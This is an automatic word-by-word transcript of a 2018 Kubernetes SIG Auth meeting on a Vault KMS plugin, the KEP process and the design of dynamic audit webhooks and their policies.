►
From YouTube: Kubernetes SIG Auth 20180725
Description
Kubernetes Auth Special-Interest-Group (SIG) Meeting 20180725
Meeting Notes/Agenda: https://docs.google.com/document/d/1woLGRoONE3EBVx-wTb4pvp4CI7tmLZ6lS26VTbosLKM/view#
Find out more about SIG Auth here: https://github.com/kubernetes/community/tree/master/sig-auth
A
B
Sure
very,
very
short,
piece.
We
are
talking
to
the
hashicorp
guys
right
after
this
meeting
we're
going
over
what
we've
gotten
working
with
walt
as
a
provider
for
the
kms
plugin.
Once
we
complete
the
discussion,
I
expect
to
get
that
repo
out
this
week,
I'll
update
this
and
issue
number
460
with
the
link
to
the
repo.
Once
it's
live.
That's
about.
A
Cool
is
that
a
cap,
or
was
that
a
just,
a
regular
design
proposal?
I
remember
seeing
it
talk
about
that.
B
A
A
A
A
C
A
C
A
What
is
the
date
for
feature
freeze?
It
is
next
tuesday.
C
C
D
Do
you
know
what
the
requirements
are
for
proposals
and
caps
around
feature
freeze?
Do
they
need
to
be
merged?
Do
they
need
to
be
marked
implementable,.
A
D
C
It's
it's
a
field
on
the
cap,
so
that's
kind
of
the
the
last
bit
for
people
to
say
yep.
This
api
makes
sense.
This
is
a
good
step
that
we
can
go
off
and
implement.
Okay,.
D
And
just
to
clarify
a
point
on
that,
it
being
implementable
obviously
doesn't
mean
that
the
design
is
finished.
We
can
still
add
pieces
and
features
layered
on
top.
It's
just
sort
of
the
proposal,
as
is,
is
kind
of
the
minimum
piece
that
we
could
implement
as
a
standalone
thing:
gotcha.
Okay,
so
specifically
in
the
context
of
like
dynamic
policy,
that's
something
that
could,
I
think,
definitely
be
layered
on
at
a
later
date.
D
E
C
Yeah
one
of
the
questions
I
have
around
the
cut
process
actually
is
once
you
kind
of
have
a
minimum,
viable
design
and
agreed
on
first
step
and
then
one
flips
to
implementable,
like
additions
from
that
point
on
how?
How
does
that
work
like
do
the
changes
to
the
design
get
opened
as
prs
and
then
just
sit
there
and
not
get
merged
until
the
the
change
or
addition
is
totally
complete
because
otherwise
you're
merging
things
into
a
dock
that
says
it
can
be
implemented.
C
A
Right
that
that
strategy
has
worked
well
for
me
in
the
past,
but
I
employed
it
with
the
token
request
stuff,
where
I
removed
a
bunch
of
the
functionality
from
the
original
design
proposal
that
allowed
it
to
merge
faster.
So
that
might
be
something
to
consider
with
the
dynamic
dynamic
audit
cap.
A
D
Yeah,
so
I
mean
it's
a
pretty
small,
add
to
what
we
already
merged.
Obviously
it's
it's
kind
of
a
big
change
there,
so
I
mean
there.
Definitely
it
needs
to
be
discussion
around
whether
we
think
that's
a
we're
comfortable
with
that
idea.
The
current
setup
is
just
kind
of
you
would
have
an
audit
configuration
object
and
right
now
we
just
have
the
web
hook
in
there.
This
should
just
add
that
policy
to
that
object.
So,
basically
just
saying
you
know,
I
can
have
multiple
instances
of
this
object.
D
Living
kind
of
independently,
whatever
policy
is
within
that
object,
would
just
log
out
to
that
workbook.
If
that
makes
sense.
C
Yeah,
I
think
conceptually
it's
simple.
This
takes
the
implementation
from
a
one
policy
to
a
many
policy
implementation
which
I
don't
know
if
we
want
to
phase
the
implementation
to
do
the
dynamic,
backends
first
and
then
tackle
sort
of
the
multi-policy
aspects.
Where
were
you
wanting
to
get?
D
D
D
Well,
I
guess
there's
this
trade-off
between
implementing
the
policy
on
the
well
the
client
side,
but
the
client
in
this
case
is
the
api
server,
since
it's
pushing
or
the
server
side,
which
is
the
receiver
of
the
audit
events.
D
D
It
kind
of
skirts
around
the
issue
of
dealing
with
aggregated
api
servers.
D
On
the
other
hand,
it
means
that
every
web
hook
needs
to
go
and
re-implement
the
policy
logic
and
you're
getting
more
traffic
over
the
wire
yeah.
The
other
piece
that
kind
of
attracts-
I
guess,
from
from
what
we're
trying
to
do
is
you
know,
say
you
want
to
send
out
just
a
specific
set
of
events
to
some
sort
of
auditing
service,
and
you
don't
want
to
expose
all
of
your
stuff
to
them.
There's
some
third
party
auditing
service,
so
you
just
want
to
send
out.
D
You
know
just
a
specific
set
of
events.
That's
well
scoped
out
to
that
service,
then
you'd
have
to
rely
on
them.
There'd
have
to
be,
I
guess,
a
trust
there
that
you
know
could
be
pretty
finicky
yeah.
That
makes
sense.
It's
a
good
point.
You
could
you
know,
bounce
the
events
through
an
intermediate
service
that
does
the
filtering,
but
again
you
get
you're
dealing
with
kind
of
paying
the
cost
of
those
extra
events
and
the
added
complexity
of
building
that
service
out
yeah.
D
You
could
proxy
it
yeah
I
mean
that's,
it's
definitely
an
option.
I
guess
it
is
kind
of
still
the
same
boot.
I
don't
know
it's
it's
tricky.
I
I
can
definitely
see.
There's
complexity
either
way
you
go
with
it,
it's
something
they
don't
want.
I
guess.
A
D
So
I
mean
definitely
for
this
iteration.
I
just
saw
it
as
privileged
cluster
operators.
I
knew
there
was
kind
of
a
desire
to
have
name
space
level
that
got
just
incredibly
complex
trying
to
do
that.
I
I
don't
want
to
try
and
tackle
that
at
the
moment.
I
can
definitely
see
the
use
of
that,
but
the
complexity
level
becomes
really
high
in
the
api
server
trying
to
try
to
kind
of
make
sense
of
that.
So.
D
Is
just
looking
at
you
know:
you
have
a
highly
privileged
cluster
admin
level,
user
and
they're
just
dynamically
configuring.
You
know
auditing
services,
you
know
external
to
kubernetes.
A
I
would
be
interested
in
analysis
of
analysis
of
how
this
impacts
the
slo
of
audit,
and
if
we
have,
we
discussed
what
our
slo
for
audit
web
hook
is,
for
example,
what
does
it
mean
to
drop
audit
events.
D
D
D
Which
means
that
they
can't
have
they
can't
get
to
the
same
slo
point
as
the
statically
configured
web
hook.
C
A
B
B
C
If
delivery
of
the
audit
law
event
fails,
we
will
not
block
the
request
as
a
result.
C
A
A
A
D
Yeah
yeah,
one
of
the
reasons
for
that
is,
if
you
allow
it
to
be
blocking,
and
you
misconfigure
your
web
hook,
you've
essentially
hosed
the
cluster
without
some
mechanism
to
kind
of
unstick.
It.
D
I
think
we
maybe
still
should
consider
it
as
an
option.
Just
because
I
mean
if
you
were
to
document
it
well,
that
you
know
people
understand
if
you're
configuring,
this
webinar,
you
could
potentially
you
know
lock
yourself
out,
but
I
could
see
facilities
that
would
potentially
require
that
I
don't
know,
there's
nothing
at
risk
involved.
I
mean
there
is
precedence
with
you
know:
admission
control,
dynamic
emission
control,
doing
that.
C
Yeah,
although
dynamic
admission
takes
steps
to
like
it
excludes
itself
from
being
governed
by
dynamic
admission,
and
it
gives
you
options
in
the
object
itself
to
let
you
exclude
like
the
name
space
containing
your
dynamically
hosted
admission
plugin.
D
That's
interesting.
Okay,
I
mean
I.
D
C
I
know
for
the
rule
evaluation
like
when,
when
you're
going
through
the
api
pipeline
and
deciding
whether
to
put
a
particular
information
into
the
audit
event
on
the
request
context
right
now,
we
have.
E
C
The
thing
that
is
responsible
for
delivering
these
events
to
the
web
hooks
is
going
to
have
to
evaluate
all
the
rules
on
all
the
policies
to
see
if
any
of
them
require
a
particular
level
of
verbosity
and
then
when
it
is
delivering
those
events,
I
think
it's
either
going
to
have
to
re-evaluate
those
rules,
or
is
it
going
to
have
to
track
more
information
about
which
levels
of
verbosity
applied
to
which
webhooks?
C
So
we
would
definitely
want
to
benchmark
with
multiple
policies,
with
multiple
rules
like
how
that
impacts,
evaluation
and
space
as
far
as
what
we're
having
to
track
on
the
request
context,
that's
why
I
was
asking
about
phasing
implementation
just
because
the
single
policy
implementation
seems
way
simpler
to
reason
about,
and
much
closer
to,
the
stuff
we've
already
benchmarked.
D
Sure
yeah,
so
one
of
the
simplifications
we
made
in
the
initial
proposal
was
that
the
dynamic
web
hooks
would
always
receive
metadata
level
events,
if
I'm
remembering
correctly.
D
So
if
we
stick
with
that
simplification,
then
the
problem
that
jordan
just
mentioned,
I'm
less
worried
about
wait.
Were
you
saying
that
only
ever
log
on
the
metadata
level
yeah,
that
would
be,
I
mean
that'd,
be
tricky,
at
least
for
our
goals,
we're
definitely
looking
for
request
response
level
there.
I.
D
A
Before
I
had
a
question
on
that
jordan,
do
you
think
this
is
more
complex
or
less
complex
than
the
reverse
indexing
that
the
watch
that
that
is
implemented
in
to
support
watching
the
api
server?
C
For
watch,
we
have
a
lot
more
dimensions
right
and
watches
are
always
scoped
to
a
single
resource
type.
So
you
also
have
lower
cardinality
on.
C
So,
for
both
of
those
reasons,
that's
this
seems
more
complex.
Also,
you
have
multiple
levels
of
delivery.
So
when
you're
delivering
a
watch
event,
the
decision
is
just
thumbs
up
or
thumbs
down
like
does
this
go
to
this
watcher,
whereas
with
audit
it's
does
this
go
to
this
watcher
and
with
what
degree
of
information
so
you're
not
just
delivering
the
same
content
to
all
watchers,
I
guess
to
tim's
point.
One
of
the
simplifying
assumptions
was.
C
D
D
That
piece
originally,
I
could
misread
us
for
this
yeah.
So
it's
the
pull-based
audit
events.
That
is
doing
the
metadata
only
assumption,
but
that
does
raise
an
interesting
point
then,
for
this
proposal
of
how
how
it
would
deal
with
aggregated
api
servers
right
now.
The
assumption
is
that
the
api
servers
that
deal
with
different
types
have
different
policies
so
that
they're
doing
whatever
they
need
to
do
to
deal
with
those
the
types
that
they
know
about.
D
C
Yeah,
I
would
actually
kind
of
expect
this
to
work
like
a
dynamic
or
web
hook
admission,
where
you're
defining
the
types
that
are
going
to
come
to
your
admission
web
hook
with
one
policy
object
and
then
all
the
api
servers
that
run
the
webhook
admission.
Plugin
will
drive
themselves
via
that
policy
and
so,
whether
that's
the
cube
api
server
for
cube
api
types
or
some
other
extension
api
server.
C
Similarly,
each
api
server
would
be
running
that
enables
this
audit
mechanism
could
feed
off
the
same
policy,
and
so
the
cube
apis
ever
would
look
at
an
audit
policy.
That
says
I
want
to
know
about
all
types
and
it
would
send
request
response
audit
events
for
cube
api
types
and
the
extension
api
server
would
look
at
that
same
policy
and
say
well,
I'm
going
to
send
request
response
audit
events
for
my
api
types.
F
That's
what
I
would
expect,
too,
that
you
should
build
it
as
an
extension.
Api
server,
read
a
policy
and
just
ignore
types
that
you
don't
have.
C
That
could
actually
be
an
optimization
right,
so
if,
in
your
policy
you
say
I
want
to
know
about
these
types
of
the
extensions
group
and
these
types
for
the
apps
group
and
this
types
for
the
acme.com
group.
Well,
the
cube
api
server
can
discard
the
groups
that
it
doesn't
serve
for
at
least
the
request
response
phases.
It
doesn't
have
to
continuously
evaluate.
C
D
Yeah
that
makes
sense
right
now.
We
I
think,
just
to
set
up
audit
on
in
the
common
case.
We
just
set
up
audit
on
the
main
aggregator
api
server
and
just
log
metadata
level
for
the
other.
F
D
So
one
option
is
if
an
api
server
gets
a
request
for
a
type
that
doesn't
know
about
it,
just
maxes
out
at
metadata
level.
Even
if
the
policy
describes
request.
C
C
C
So
patrick,
it
sounds
like
there's
not
necessarily
disagreement
about
letting
the
policy
be
per
web
hook
or
different
per
web
hook.
But
if
we're
looking
at
something
like
an
actual
deliverable
for
the
112
time
frame,
getting
both
of
those
implemented
seems
aggressive
to
me.
I'm
not
sure
what
what
tim
would
think.
D
C
My
guess
would
be,
it
would
mostly
be
impact
on
api
machinery
for
getting
all
the
making
sure
the
pieces
that
need
to
be
dynamically.
Evaluable
are
plumbed
correctly
and
then,
like
involvement
from
scalability,
to
make
sure
that
the
the
testing
that
we've
already
done,
we
know
how
this
impacts
it
and
we
know
whether
the
impact
is
acceptable
or
not.
C
So
I
I
I
just
to
get
something
use
usable
earlier.
I
I'd
like
to
see
kind
of
the
first
phase
go
in
and
then
kind
of
cue
up
the
the
dynamic
policy
bit,
but
I
don't
know
what
other
people
think.
D
I
think
we're
probably
good
on
that.
We
can
definitely
focus
on
you
know
just
that
first
piece.
I
think
that
is
a
good
sized
chunk,
get
that
in
there
get
it
benchmarked
you
know
and
then
get
with
sig.
You
know
api
machinery
and
scalability
and
kind
of
talk
to
him
about
the
the
policy
piece
I
and
just
track
that
as
we
go
things
go
super
quick,
maybe
squeeze
it
in
there.
Otherwise,
you
know
just
drag
it
down
the
line.
D
Yeah,
I
think
I
agree
with
that
and
just
kind
of
keep
in
mind
the
eventual
goal
of
adding
the
policy
when
you're
factoring
in
the
code
and
whatnot
yep,
all
right,
a
couple
questions
and
real
quick.
D
If,
if
say
I
configure
webhook
dynamically
and
there's
new
policy
statically
configured
through
a
flag,
would
that
it
would
just
nothing
would
happen
right.
C
Is
that
what
happens
today
with
the
I
guess,
is
it
even
possible
to
configure
flag?
I
guess
you,
you
would
enable
this
audit
back
end
explicitly
on
the
command
line.
It
would
probably
be
an
error
currently
to
say
you
want
this
and
not
specify
a
policy
file.
C
Like
I
think,
if
you
say
you
want
this,
and
you
don't
specify
a
policy
file,
we
probably
should
not
start
like
that.
That
seems
like
a
mistake,
rather
than
something
useful
to
let
them
do.
D
E
D
Agree
that
I
would
expect
this
to
work
the
same
way,
okay,
at
least
until
we
have
thank
you.
D
One
more
question
I
want
to
raise
on
the
dynamic
policy
is:
if
we
allow
the
policy
to
raise
the
audit
level
above
the
static
policy,
then
we
get
into
this
kind
of
funny
thing
where
you
can
set
up
a
audit
web
hook
that
exports
secret
data,
for
instance,
and
is
that
something
that
we're
okay
with
from
a
security
perspective,
because
it
basically
means
that
the
ability
to
configure
an
audit
web
hook
gives
you
read
access
for
all
resources
in
the
cluster.
D
You
know
I
mean
options
being
to
either
just
document
that
well
or
provide
some
sort
of.
You
know
override
that
you
can't
ever
go
above
a
statically
configured
policy.
I
think
we
ran
into
any.
We
initially
explored
that
we
ran
into
some
issues,
just
some
strange
edge
cases
around
around
trying
to
do
that.
C
D
C
F
I
think
the
other
kind
of
confusing
thing
that
came
up
in
discussion
before
was
that
you
can't
really
say
whether
one
audit
policy
is
more
or
less
restrictive
than
another,
because
there's
multiple
dimensions
by
which
you
can
restrict
them.
So
it
might
be
that
you
want
to
restrict
which
namespaces
can
be
logged
or
you
might
want
to
reject
which
level
can
be
logged
at
sort
of
it.
It's
sort
of
not
intuitive
to
other
restriction.
E
C
If
we
want
a
way
to
limit
it,
an
all
or
nothing
type
of
the
all
or
nothing
today
is:
do
you
even
enable
this
dynamic
mechanism
once
there's
the
ability
to
specify
per.
C
Dynamic
web
policy
just
letting
the
person
running
the
cluster
decide
if
they
want
to
allow
that
or
not
seems
because
they're,
the
ones
who
know
what.
How.
A
D
C
Sure
I
mean
yeah,
we
can't
support
both
use
cases
at
the
same
time.
So
I
think
we
want.
We
don't
want
degrees
of
freedom
that
don't
serve
specific
use
cases,
and
we
want
to
make
sure
that
the
reasonable
use
cases
that
we
can
handle
are
handled
in
a
pretty
straightforward
way.
So
laying
those
out
and
saying
what
what
knobs
would
you
have
to
turn
and
what
would
you
have
to
do
to
accomplish
this
and
that's
a
good
thing
to
do
when
you're
kind
of
building
a
feature
like
this?
C
D
I
had
another
question
around.
I
brought
this
up
in
seed
api
machinery,
but
you
know
we.
Obviously
we
need
an
informer
around
the
configuration
file.
I
was
originally
mapping
towards
dynamic
admission,
but
apparently
that
that
was
an
exception
and
the
informers
and
clients
should
not
be
in
client
go
for
something
like
this.
They
should
actually
be
within
the
api
server
itself.
The
api
server
doesn't
seem
to
have
any
informers
generated
today.
Is
that
something
I
should
just
add
in
there.
C
A
Does
that
cover
what
you
wanted
to
discuss
about
the
audit
policy
cap.
D
Yeah,
I
think
that
gives
us
clear
direction
going
forward
said
if
I
appreciate
everybody
jumping
in
and
yeah
we'll
start
on
the
we'll
start
on
the
basic
stuff
and
see
if
everything
with
that
so.
C
Yeah
and
and
make
sure
that
it
is
on
the
board
for
api
review.
So
one
of
the
things
we're
trying
to
do
regarding
api
review
is
let
cigs
kind
of
decide
what
projects
have
value
and
what
directions
they
want
to
go
and
then,
once
there
are
kept
describing
like
why
this
is
an
important
thing
to
do.
That
has
approval
from
the
stig.
Then
it
gets
queued
up
to
make
sure
the
the
api
makes
sense.
We're
trying
to
do
like
a
little
better
job
of
pipelining
these
things
and
getting
visibility
early.
C
So
now
that
this
has
the
first
stage
of
it
has
kind
of
gotten
agreement
yeah,
I
would
open
a
pr
to
flip
it
to
implementable,
and
I
will
send
you
a
link
to
the.
D
So
yeah,
I
need
to
add
an
issue
as
well.
I
guess
over
there.